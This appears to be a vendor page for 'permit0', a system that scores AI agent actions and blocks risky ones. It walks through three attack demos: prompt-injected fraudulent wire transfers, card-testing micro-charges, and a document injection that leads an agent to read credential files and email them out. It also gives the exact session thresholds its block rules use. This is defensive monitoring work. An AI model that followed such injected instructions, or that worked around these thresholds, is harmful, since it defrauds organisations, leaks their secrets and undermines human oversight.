Permit0

Actions, Risks & Threats

Every agent action is normalized, scored, and routed through a deterministic risk pipeline. Here's what we detect, how we score it, and what happens when an attack chain unfolds.

20+1

Domains

Groups

Risk Flags

Tiers

Minimal / Low -- auto-allow

Medium -- agent reviewer (Human or Deny)

High -- human-in-the-loop required

Critical -- deny (blocked)

All Domains

Live

Today, only Email domain actions are live. The rest of this taxonomy is published as our reference taxonomy — implementation will follow, prioritized by demand.

Risk Scoring Engine

9 Risk Flags

Multiple flags fire simultaneously. Each carries a base weight. Three categories: Data, Power, Control.

10 Amplifier Dimensions

Weights sum to 1.0. Context shapes the final score. Three are multiplicative: destination, boundary, irreversibility.

Session-Aware Threat Detection

Attack chains caught in real time.

Individual actions may look benign. permit0 watches the session as a whole and fires immutable block rules when attack patterns emerge.

Attack Scenarios — Step by Step

Three real attacks. Three different blocks.

Each example shows an AI agent being exploited — and how the scoring pipeline catches the attack before damage occurs.

🏦

Demo 1: APP Fraud — Scatter Transfer

Procurement agent tricked into wiring to 6 fraudulent vendors

blocked ▼

Scenario: A procurement agent receives fake supplier invoices via prompt injection. Each wire looks like a legitimate invoice payment to a foreign vendor.

payments.transfer → GBP 12,000 to Vendor Alpha Ltd (UK)

Score: 0.42 — MEDIUM tier. Routed to agent reviewer. Reviewer: plausible procurement. Decision: Human.

FINANCIAL OUTBOUND MUTATION

payments.transfer → EUR 8,500 to Berlin Components GmbH (DE)

Score: 0.45 — MEDIUM tier. Session rule fires: record_count > 1. Scope +6, amount +4.

FINANCIAL OUTBOUND

payments.transfer → EUR 15,000 to Lyon Fabrication SARL (FR)

Score: 0.52 — MEDIUM tier escalating. 3 distinct recipients now tracked. Cumulative: EUR 35,500.

FINANCIAL GOVERNANCE

payments.transfer → CHF 22,000 to Swiss Precision AG (CH)

Score: 0.61 — HIGH tier. Human-in-the-loop required. 4 distinct recipients, 4 different currencies.

FINANCIAL GOVERNANCE OUTBOUND

payments.transfer → SGD 9,500 to SG Microelectronics Pte (SG)

Score: 0.68 — HIGH tier. 5 distinct recipients in under 45 minutes. Approaching scatter threshold.

FINANCIAL GOVERNANCE

payments.transfer → AED 18,000 to Gulf Trading FZE (UAE)

BLOCKED by scatter_transfer rule. 6 distinct recipients within 60 minutes = APP fraud pattern.

FINANCIAL SESSION BLOCK

Block rule: scatter_transfer()
Fires when session contains 6+ distinct recipients within a 60-minute window. Designed to catch Authorized Push Payment (APP) fraud where agents are socially engineered into paying fake invoices across multiple accounts.

💳

Demo 2: Card Testing Attack

Compromised checkout agent probes card validity with micro-charges

blocked ▼

Scenario: A checkout agent has been compromised. It rapid-fires micro-charges (<$2) to distinct customers to probe for valid card numbers before attempting larger fraudulent charges.

payments.charge → $0.50 to cus_alice_001

Score: 0.28 — LOW tier. Small amount, known customer. Auto-allowed.

FINANCIAL MUTATION

payments.charge → $0.75 to cus_bob_002

Score: 0.31 — LOW tier. Second micro-charge. Still within normal range.

FINANCIAL

payments.charge → $1.00 to cus_carol_003

Score: 0.48 — MEDIUM tier. Session rule fires: record_count > 2. Scope +24, amount +22, sensitivity +18.

FINANCIAL GOVERNANCE

payments.charge → $0.50 to cus_dave_004

Score: 0.62 — HIGH tier. 4 distinct customers in rapid succession. Human approval required.

FINANCIAL GOVERNANCE

payments.charge → $1.00 to cus_eve_005

BLOCKED by card_testing rule. 5 micro-charges (<$2) to distinct customers within 10 minutes.

FINANCIAL SESSION BLOCK

Block rule: card_testing()
Fires when 5+ micro-charges (<$2) hit distinct customers within a 10-minute window. Prevents fraud rings from probing card validity through a compromised payment agent.

🔓

Demo 3: Insider Exfiltration Chain

Prompt injection redirects agent to steal credentials and email them externally

blocked ▼

Scenario: A task agent is asked to "summarize the app config." A prompt injection in a document redirects it to read credential files and email them to an external address.

files.read → /app/README.md

Score: 0.08 — MINIMAL tier. Benign documentation file. Auto-allowed.

MUTATION

files.read → /app/config/credentials.json

Score: 0.48 — MEDIUM tier. Sensitive file detected. EXPOSURE flag fires. Sensitivity +20.

EXPOSURE GOVERNANCE

files.read → /app/.env.production

Score: 0.51 — MEDIUM tier. Second credential file. EXPOSURE flag sequence building in session context.

EXPOSURE

email.send → attacker@external-domain.com (with credential summary)

BLOCKED by read_then_exfiltrate rule. External email send detected after EXPOSURE flags in recent session history.

OUTBOUND EXPOSURE SESSION BLOCK

Block rule: read_then_exfiltrate()
Fires when an external email send is attempted after recent EXPOSURE-flagged actions in the same session. Interrupts data exfiltration chains before credentials escape the perimeter.

Action Policy Deep Dives

Context changes everything.

The same action type can score anywhere from MINIMAL to CRITICAL depending on entities, session history, and environment.

🏦 payments.transfer critical

Flags: FINANCIAL (primary) · OUTBOUND (primary) · MUTATION (secondary)

Amplifiers: amount(18) · scope(10) · irreversibility(14) · destination(20) · boundary(10) · sensitivity(8)

Context	Effect	Why
Amount < $1,000	medium	Low financial magnitude. Amount dimension stays moderate.
Amount $1K-$10K	high	Amount +12. Requires human sign-off.
Amount > $10K	gate	Amount +25. Hard gate — always human approval.
Amount > $250K	block	Exceeds session cumulative limit. Denied outright.
Cross-currency (e.g., USD → CHF)	upgrade	Boundary +8. Cross-region = unfamiliar destination risk.
Recipient not in approved payee list	upgrade	Destination +14. Unknown payee requires verification.
Production environment	upgrade	Environment override to 15. Real money at stake.

Session-aware: 6+ distinct recipients in 60 min → scatter_transfer block. Cumulative > $500K → session cap. Preceded by iam.assign_role → privilege_escalation_then_large_transfer block.

💳 payments.charge critical

Flags: FINANCIAL (primary) · OUTBOUND (primary) · MUTATION (secondary)

Amplifiers: amount(12) · scope(8) · irreversibility(10) · destination(15) · boundary(8)

Context	Effect	Why
Amount < $100	allow+log	Low amount. Stays in MEDIUM tier range.
Amount $100-$1,000	approval	Amount +12. Human sign-off required.
Amount > $1,000	gate	Amount +25. Hard gate — never auto-approves.
New/unknown customer	upgrade	Destination +14, actor +10. Unknown = higher risk.
Currency ≠ org default	upgrade	Boundary +8. Cross-currency = cross-region risk.

Session-aware: 5+ micro-charges (<$2) to distinct customers in 10 min → card_testing block. record_count > 2 → scope +24, amount +22, sensitivity +18.

✉️ email.send high

Flags: OUTBOUND (primary) · EXPOSURE (primary) · MUTATION (secondary)

Context	Effect	Why
Recipient: internal domain	downgrade	Reduce destination + boundary. Internal = lower risk.
Recipient: external domain	upgrade	Destination +14. Crossing trust boundary.
Body contains credentials/keys	gate	Sensitivity +20. Promote EXPOSURE flag. Possible exfiltration.
50+ recipients (BCC)	gate	Scope +25. Add GOVERNANCE flag. Mass mailing.
Send rate > 20/min	gate	Volume +18. Bulk exfiltration pattern.

Session-aware: Preceded by EXPOSURE-flagged file reads → read_then_exfiltrate block. Rate > 20/min → bulk_external_send block. Sensitivity +12, destination +8 if file reads in last 5 actions.

📁 files.read low

Flags: MUTATION (secondary, default only)

Context	Effect	Why
Path: documentation, README	allow	Benign content. No flag escalation.
Path: .env, credentials.json	upgrade	Add EXPOSURE + GOVERNANCE flags. Sensitivity +20.
Path: /etc/shadow, /etc/passwd	gate	System credentials. EXPOSURE + GOVERNANCE. Hard gate.
Path matches PII patterns	upgrade	EXPOSURE secondary flag. Sensitivity escalation.

Session-aware: Reading credential files sets the EXPOSURE flag in session context. If followed by email.send to external domain → read_then_exfiltrate fires. The read alone is allowed, but it primes the chain detector.

⚙️ process.shell high

Flags: EXECUTION (primary) · MUTATION (primary)

Context	Effect	Why
Contains rm -rf, shred, truncate	gate	Add DESTRUCTION flag. Irreversibility +10. Catastrophic.
Contains curl, wget, scp	upgrade	Add OUTBOUND flag. Destination +15, boundary +8.
Contains sudo, chmod 777	gate	Add PRIVILEGE flag. Scope +15, actor +10.
Contains password, token, key	gate	Add EXPOSURE flag. Sensitivity +20.

Session-aware: If preceded by iam.assign_role within last 3-5 actions → privilege_escalation_then_exec block. Pattern: escalate privileges then execute code = caught.